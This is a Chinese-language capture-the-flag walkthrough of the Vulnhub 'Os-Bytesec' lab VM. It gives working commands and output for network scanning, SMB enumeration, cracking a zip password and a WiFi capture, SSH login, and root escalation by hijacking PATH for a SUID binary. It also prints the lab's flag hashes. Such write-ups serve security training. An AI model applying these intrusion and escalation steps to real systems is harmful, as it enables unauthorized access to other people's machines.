Vulnhub之OS Bytesec靶机详细测试过程

OS Bytesec

作者：jason huawen
靶机信息

名称：hackNos: Os-Bytesec
地址：

1. https://www.vulnhub.com/entry/hacknos-os-bytesec,393/

复制代码

识别目标主机IP地址

1. (kali㉿kali)-[~/Vulnhub/OS_Bytesec]
2. └─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
4. Currently scanning: Finished!   |   Screen View: Unique Hosts                                                              
5.                                                                                                                            
6. 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
7. _____________________________________________________________________________
8.    IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
9. -----------------------------------------------------------------------------
10. 192.168.56.1    0a:00:27:00:00:06      1      60  Unknown vendor                                                           
11. 192.168.56.100  08:00:27:60:36:cf      1      60  PCS Systemtechnik GmbH                                                   
12. 192.168.56.254  08:00:27:31:66:d4      1      60  PCS Systemtechnik GmbH               

复制代码

利用Kali Linux的netdiscover工具识别目标主机IP地址为192.168.56.254
NMAP扫描

1. ┌──(kali㉿kali)-[~/Vulnhub/OS_Bytesec]
2. └─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
3. Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-25 22:14 EDT
4. Nmap scan report for bogon (192.168.56.254)
5. Host is up (0.00027s latency).
6. Not shown: 65531 closed tcp ports (reset)
7. PORT     STATE SERVICE     VERSION
8. 80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
9. |_http-server-header: Apache/2.4.18 (Ubuntu)
10. |_http-title: Hacker_James
11. 139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
12. 445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
13. 2525/tcp open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
14. | ssh-hostkey:
15. |   2048 12554f1ee97eea8769901c1fb0633ff3 (RSA)
16. |   256 a670f10edf4e737d7142d644f12f24d2 (ECDSA)
17. |_  256 f0f8fd24650734c2d49a1fc0b82ed83a (ED25519)
18. MAC Address: 08:00:27:31:66:D4 (Oracle VirtualBox virtual NIC)
19. Service Info: Host: NITIN; OS: Linux; CPE: cpe:/o:linux:linux_kernel
21. Host script results:
22. |_clock-skew: mean: -1h50m00s, deviation: 3h10m31s, median: 0s
23. | smb2-time:
24. |   date: 2023-03-26T02:14:37
25. |_  start_date: N/A
26. |_nbstat: NetBIOS name: NITIN, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
27. | smb-security-mode:
28. |   account_used: guest
29. |   authentication_level: user
30. |   challenge_response: supported
31. |_  message_signing: disabled (dangerous, but default)
32. | smb2-security-mode:
33. |   311:
34. |_    Message signing enabled but not required
35. | smb-os-discovery:
36. |   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
37. |   Computer name: nitin
38. |   NetBIOS computer name: NITIN\x00
39. |   Domain name: 168.1.7
40. |   FQDN: nitin.168.1.7
41. |_  System time: 2023-03-26T07:44:37+05:30
43. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
44. Nmap done: 1 IP address (1 host up) scanned in 13.91 seconds
45.                                                                      

复制代码

获得Shell

首先从smb协议入手收集信息：

1. ──(kali㉿kali)-[~/Vulnhub/OS_Bytesec]
2. └─$ smbclient -L 192.168.56.254                                
3. Password for [WORKGROUP\kali]:
5.         Sharename       Type      Comment
6.         ---------       ----      -------
7.         print$          Disk      Printer Drivers
8.         IPC$            IPC       IPC Service (nitin server (Samba, Ubuntu))
9. Reconnecting with SMB1 for workgroup listing.
11.         Server               Comment
12.         ---------            -------
14.         Workgroup            Master
15.         ---------            -------
16.         WORKGROUP            NITIN

复制代码

1. ──(kali㉿kali)-[~/Vulnhub/OS_Bytesec]
2. └─$ enum4linux 192.168.56.254
3. [+] Enumerating users using SID S-1-22-1 and logon username '', password ''                                                  
4.                                                                                                                              
5. S-1-22-1-1000 Unix User\sagar (Local User)                                                                                   
6. S-1-22-1-1001 Unix User\blackjax (Local User)
7. S-1-22-1-1002 Unix User\smb (Local User)

复制代码

利用enum4linux工具识别出用户名为sagar, blackjax, smb
利用Kali linux的浏览器访问80端口，从返回页面的源代码有以下注释：

1. Copyright © All rights reserved | This template is made with James/Hacker <i  aria-hidden="true"></i> by <a href="https://www.cnblogs.com/http:jameshacker.me" target="_blank">James</a>
3.                
4.         </footer>
5.        

复制代码

似乎没有意义。

1. ──(kali㉿kali)-[~/Vulnhub/OS_Bytesec]
2. └─$ nikto -h http://192.168.56.254
3. - Nikto v2.1.6
4. ---------------------------------------------------------------------------
5. + Target IP:          192.168.56.254
6. + Target Hostname:    192.168.56.254
7. + Target Port:        80
8. + Start Time:         2023-03-25 22:20:22 (GMT-4)
9. ---------------------------------------------------------------------------
10. + Server: Apache/2.4.18 (Ubuntu)
11. + The anti-clickjacking X-Frame-Options header is not present.
12. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
13. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
14. + No CGI Directories found (use '-C all' to force check all possible dirs)
15. + Server may leak inodes via ETags, header found with file /, inode: c0e, size: 59686492a99fd, mtime: gzip
16. + Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
17. + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
18. + OSVDB-3268: /css/: Directory indexing found.
19. + OSVDB-3092: /css/: This might be interesting...
20. + OSVDB-3268: /html/: Directory indexing found.
21. + OSVDB-3092: /html/: This might be interesting...
22. + OSVDB-3268: /img/: Directory indexing found.
23. + OSVDB-3092: /img/: This might be interesting...
24. + OSVDB-3233: /icons/README: Apache default file found.
25. + 7915 requests: 0 error(s) and 13 item(s) reported on remote host
26. + End Time:           2023-03-25 22:20:34 (GMT-4) (12 seconds)
27. ---------------------------------------------------------------------------
28. + 1 host(s) tested

复制代码

1. ──(kali㉿kali)-[~/Vulnhub/OS_Bytesec]
2. └─$ gobuster dir -u http://192.168.56.254 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.js,.html,.txt,.sh
3. ===============================================================
4. Gobuster v3.3
5. by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
6. ===============================================================
7. [+] Url:                     http://192.168.56.254
8. [+] Method:                  GET
9. [+] Threads:                 10
10. [+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
11. [+] Negative Status codes:   404
12. [+] User Agent:              gobuster/3.3
13. [+] Extensions:              sh,php,js,html,txt
14. [+] Timeout:                 10s
15. ===============================================================
16. 2023/03/25 22:21:04 Starting gobuster in directory enumeration mode
17. ===============================================================
18. /index.html           (Status: 200) [Size: 3086]
19. /.html                (Status: 403) [Size: 279]
20. /news                 (Status: 301) [Size: 315] [--> http://192.168.56.254/news/]
21. /img                  (Status: 301) [Size: 314] [--> http://192.168.56.254/img/]
22. /html                 (Status: 301) [Size: 315] [--> http://192.168.56.254/html/]
23. /gallery              (Status: 301) [Size: 318] [--> http://192.168.56.254/gallery/]
24. /css                  (Status: 301) [Size: 314] [--> http://192.168.56.254/css/]
25. /js                   (Status: 301) [Size: 313] [--> http://192.168.56.254/js/]
26. /.html                (Status: 403) [Size: 279]
27. /server-status        (Status: 403) [Size: 279]
28. Progress: 1323306 / 1323366 (100.00%)===============================================================
29. 2023/03/25 22:22:39 Finished
30. ===============================================================

复制代码

目录扫描阶段一无所获，但是其实注意到网页中有句：####################GET#####smb##############free
而前面也知道有用户名smb,而且smb free,是不是意味着没有密码，注意smbclient -L并没有得到共享目录/smb，

1. ┌──(kali㉿kali)-[~/Vulnhub/OS_Bytesec/_anatomy.png.extracted]
2. └─$ smbclient //192.168.56.254/smb -U smb -p
3. Password for [WORKGROUP\smb]:
4. Try "help" to get a list of possible commands.
5. smb: \> ls
6.   .                                   D        0  Mon Nov  4 06:50:37 2019
7.   ..                                  D        0  Mon Nov  4 06:37:28 2019
8.   main.txt                            N       10  Mon Nov  4 06:45:38 2019
9.   safe.zip                            N  3424907  Mon Nov  4 06:50:37 2019
11.                 9204224 blocks of size 1024. 5824788 blocks available
12. smb: \> get main.txt
13. getting file \main.txt of size 10 as main.txt (4.9 KiloBytes/sec) (average 4.9 KiloBytes/sec)
14. smb: \> get safe.zip
15. getting file \safe.zip of size 3424907 as safe.zip (101352.3 KiloBytes/sec) (average 95561.3 KiloBytes/sec)
16. smb: \> pwd
17. Current directory is \\192.168.56.254\smb\

复制代码

1. ┌──(kali㉿kali)-[~/Vulnhub/OS_Bytesec]
2. └─$ unzip safe.zip  
3. Archive:  safe.zip
4. [safe.zip] secret.jpg password:                                                                                                                              
5. ┌──(kali㉿kali)-[~/Vulnhub/OS_Bytesec]
6. └─$ zip2john safe.zip > hashes              
7. ver 2.0 efh 5455 efh 7875 safe.zip/secret.jpg PKZIP Encr: TS_chk, cmplen=60550, decmplen=62471, crc=6D48091C ts=0BA2 cs=0ba2 type=8
8. ver 2.0 efh 5455 efh 7875 safe.zip/user.cap PKZIP Encr: TS_chk, cmplen=3364011, decmplen=6920971, crc=717BA9D6 ts=6088 cs=6088 type=8
9. NOTE: It is assumed that all files in each archive have the same password.
10. If that is not the case, the hash may be uncrackable. To avoid this, use
11. option -o to pick a file at a time.
12.                                                                                                                               
13. ┌──(kali㉿kali)-[~/Vulnhub/OS_Bytesec]
14. └─$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes   
15. Using default input encoding: UTF-8
16. Loaded 1 password hash (PKZIP [32/64])
17. Will run 2 OpenMP threads
18. Press 'q' or Ctrl-C to abort, almost any other key for status
19. hacker1          (safe.zip)     
20. 1g 0:00:00:00 DONE (2023-03-25 23:01) 14.28g/s 468114p/s 468114c/s 468114C/s softball27..eatme1
21. Use the "--show" option to display all of the cracked passwords reliably
22. Session completed.

复制代码

解压后里面有个图片和抓包。图片检查后未发现有用信息。打开user.cap发现是一个wifi抓包，wifi名为blackjax。

1. ─(kali㉿kali)-[~/Vulnhub/OS_Bytesec]
2. └─$ aircrack-ng -w /usr/share/wordlists/rockyou.txt user.cap

复制代码

找到Key为：snowflake
会不会用户名是blackjax, 密码为snowflake

1. ┌──(kali㉿kali)-[~/Vulnhub/OS_Bytesec]
2. └─$ ssh blackjax@192.168.56.254 -p 2525
3. The authenticity of host '[192.168.56.254]:2525 ([192.168.56.254]:2525)' can't be established.
4. ED25519 key fingerprint is SHA256:1l05HpfviqAHWEW02NNLxk4zhf2Ne1fS5QnCd7hTGQA.
5. This key is not known by any other names.
6. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
7. Warning: Permanently added '[192.168.56.254]:2525' (ED25519) to the list of known hosts.
8. blackjax@192.168.56.254's password:
9. Permission denied, please try again.
10. blackjax@192.168.56.254's password:
11. Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-142-generic i686)
13. * Documentation:  https://help.ubuntu.com
14. * Management:     https://landscape.canonical.com
15. * Support:        https://ubuntu.com/advantage
17. 151 packages can be updated.
18. 100 updates are security updates.
22. The programs included with the Ubuntu system are free software;
23. the exact distribution terms for each program are described in the
24. individual files in /usr/share/doc/*/copyright.
26. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
27. applicable law.
30. The programs included with the Ubuntu system are free software;
31. the exact distribution terms for each program are described in the
32. individual files in /usr/share/doc/*/copyright.
34. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
35. applicable law.
37. Last login: Mon Nov  4 15:37:42 2019 from 192.168.1.50
38. $ id
39. uid=1001(blackjax) gid=1001(blackjax) groups=1001(blackjax)
40. $

复制代码

提权

1. $ cat user.txt
2.   _    _  _____ ______ _____        ______ _               _____
3. | |  | |/ ____|  ____|  __ \      |  ____| |        /\   / ____|
4. | |  | | (___ | |__  | |__) |_____| |__  | |       /  \ | |  __
5. | |  | |\___ \|  __| |  _  /______|  __| | |      / /\ \| | |_ |
6. | |__| |____) | |____| | \ \      | |    | |____ / ____ \ |__| |
7.   \____/|_____/|______|_|  \_\     |_|    |______/_/    \_\_____|
8.                                                                  
9.                                                                  
11. Go To Root.
13. MD5-HASH : f589a6959f3e04037eb2b3eb0ff726ac

复制代码

1. blackjax@nitin:/tmp$ find / -perm -4000 -type f 2>/dev/null

复制代码

1. blackjax@nitin:/tmp$ ls -alh /usr/bin/netscan
2. -rwsr-xr-x 1 root root 7.3K Nov  4  2019 /usr/bin/netscan

复制代码

netscan命令有SUID位

1. blackjax@nitin:/tmp$ /usr/bin/netscan
2. Active Internet connections (servers and established)
3. Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
4. tcp        0      0 0.0.0.0:2525            0.0.0.0:*               LISTEN      1012/sshd      
5. tcp        0      0 0.0.0.0:445             0.0.0.0:*               LISTEN      890/smbd        
6. tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      1015/mysqld     
7. tcp        0      0 0.0.0.0:139             0.0.0.0:*               LISTEN      890/smbd        
8. tcp        0      0 192.168.56.254:139      192.168.56.206:50834    ESTABLISHED 1876/smbd      
9. tcp        0    168 192.168.56.254:2525     192.168.56.206:57618    ESTABLISHED 5032/sshd: blackjax
10. tcp6       0      0 :::2525                 :::*                    LISTEN      1012/sshd      
11. tcp6       0      0 :::445                  :::*                    LISTEN      890/smbd        
12. tcp6       0      0 :::139                  :::*                    LISTEN      890/smbd        
13. tcp6       0      0 :::80                   :::*                    LISTEN      1150/apache2   

复制代码

netscan命令应该在执行netstat命令因此可以生成我们自己的netstat

1. blackjax@nitin:/tmp$ echo '/bin/sh' > netstat
2. blackjax@nitin:/tmp$ chmod 777 netstat
3. blackjax@nitin:/tmp$ export PATH=/tmp:$PATH
4. blackjax@nitin:/tmp$ /usr/bin/netscan
5. # cd /root
6. # ls -alh
7. total 36K
8. drwx------  3 root root 4.0K Nov  4  2019 .
9. drwxr-xr-x 22 root root 4.0K Nov  4  2019 ..
10. -rw-------  1 root root 2.5K Nov  4  2019 .bash_history
11. -rw-r--r--  1 root root 3.1K Oct 22  2015 .bashrc
12. drwxr-xr-x  2 root root 4.0K Nov  4  2019 .nano
13. -rw-r--r--  1 root root  148 Aug 17  2015 .profile
14. -rw-r--r--  1 root root  505 Nov  4  2019 root.txt
15. -rw-------  1 root root 4.9K Nov  4  2019 .viminfo
16. # cat root.txt
17.     ____  ____  ____  ______   ________    ___   ______
18.    / __ \/ __ \/ __ \/_  __/  / ____/ /   /   | / ____/
19.   / /_/ / / / / / / / / /    / /_  / /   / /| |/ / __  
20. / _, _/ /_/ / /_/ / / /    / __/ / /___/ ___ / /_/ /  
21. /_/ |_|\____/\____/ /_/____/_/   /_____/_/  |_\____/   
22.                      /_____/                           
23. Conguratulation..
25. MD5-HASH : bae11ce4f67af91fa58576c1da2aad4b
27. Author : Rahul Gehlaut
29. Contact : https://www.linkedin.com/in/rahulgehlaut/
31. WebSite : jameshacker.me
35. #

复制代码

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！